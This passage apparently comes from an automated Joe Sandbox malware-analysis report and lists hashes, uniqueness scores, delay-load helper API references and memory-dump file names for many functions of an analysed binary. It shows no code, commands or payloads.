                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: f6842ed2f083c4e8a02bc4d0de6f49ca9376249fb1be4f7e0168024a71470798
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: ce694510998c28e0d4fe41327b27a6c436552b14092c6cda3e913f9d81e832c3
                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: ce694510998c28e0d4fe41327b27a6c436552b14092c6cda3e913f9d81e832c3
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 8febd6839a7b472b51aac3d0b8ef17d0fcfb5d876aa224d01f0311119e0ab59a
                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: 8febd6839a7b472b51aac3d0b8ef17d0fcfb5d876aa224d01f0311119e0ab59a
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: fbe0805510eecfd5da87d4071480d75f0755e73e626bce67d6ed0dd8834a280c
                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: fbe0805510eecfd5da87d4071480d75f0755e73e626bce67d6ed0dd8834a280c
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: bc820032ed3622b1a0880f7c7daddf1a4a940f87742772f023b64617435a9db1
                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: bc820032ed3622b1a0880f7c7daddf1a4a940f87742772f023b64617435a9db1
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: b81e9fd7e8f33c4cbf0f716cf6b11711df3c1c03a885548aee1f1402af9bd77f
                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: b81e9fd7e8f33c4cbf0f716cf6b11711df3c1c03a885548aee1f1402af9bd77f
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 4b6d32c2bb47c467f26c45cb5582e770679420693cbe24ab74ab5ff2c6a7be99
                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: 4b6d32c2bb47c467f26c45cb5582e770679420693cbe24ab74ab5ff2c6a7be99
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE1E3
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: d54123d6dabfd96f32e5be2ba533ab22f08fe72ff952218cd08ac8aefdeaa4bd
                                                                                                                                          • Instruction ID: 45ed7f13fb5a3cdd02dbce2fae65dcc72158eba462eacb786044414a9e8d47e4
                                                                                                                                          • Opcode Fuzzy Hash: d54123d6dabfd96f32e5be2ba533ab22f08fe72ff952218cd08ac8aefdeaa4bd
                                                                                                                                          • Instruction Fuzzy Hash: 89A012E1298185BC702821029C02C7B020DC1C0B60330843DF907C08915C4028412870
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 4ab03db20d400b53138adf418345be7a1fc47bc92a2f341de4a85c751df1af0f
                                                                                                                                          • Instruction ID: 4ffc8fb73d2683e800e25dbaaa58aafc4614323b37b8e972d42957dff2d4dfca
                                                                                                                                          • Opcode Fuzzy Hash: 4ab03db20d400b53138adf418345be7a1fc47bc92a2f341de4a85c751df1af0f
                                                                                                                                          • Instruction Fuzzy Hash: D1A012E11942C53C700C21009C0AC7B021CC1C0B20330402DF515908915C4008412472
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: c16912460591f2d779a8b270e6ed5d075a146893abc5b03a1eb53111014f007b
                                                                                                                                          • Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
                                                                                                                                          • Opcode Fuzzy Hash: c16912460591f2d779a8b270e6ed5d075a146893abc5b03a1eb53111014f007b
                                                                                                                                          • Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 1afdf7e1e0900deb89971691ce191539daa820545079e0ba173fd755b103008d
                                                                                                                                          • Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
                                                                                                                                          • Opcode Fuzzy Hash: 1afdf7e1e0900deb89971691ce191539daa820545079e0ba173fd755b103008d
                                                                                                                                          • Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 61aa893d589da0330f1db68cc042b1abf2084e338683ada984d79e79029ca25b
                                                                                                                                          • Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
                                                                                                                                          • Opcode Fuzzy Hash: 61aa893d589da0330f1db68cc042b1abf2084e338683ada984d79e79029ca25b
                                                                                                                                          • Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: a2ad1a3d7a19edc122b747d16b02fa01e73d4c55184b69409b6ad7ec188781c7
                                                                                                                                          • Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
                                                                                                                                          • Opcode Fuzzy Hash: a2ad1a3d7a19edc122b747d16b02fa01e73d4c55184b69409b6ad7ec188781c7
                                                                                                                                          • Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 30aa9d3f8e743536b6da2bcbdffb1a8e44e613c23e586de0b0fd66a4184344b2
                                                                                                                                          • Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
                                                                                                                                          • Opcode Fuzzy Hash: 30aa9d3f8e743536b6da2bcbdffb1a8e44e613c23e586de0b0fd66a4184344b2
                                                                                                                                          • Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE51F
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
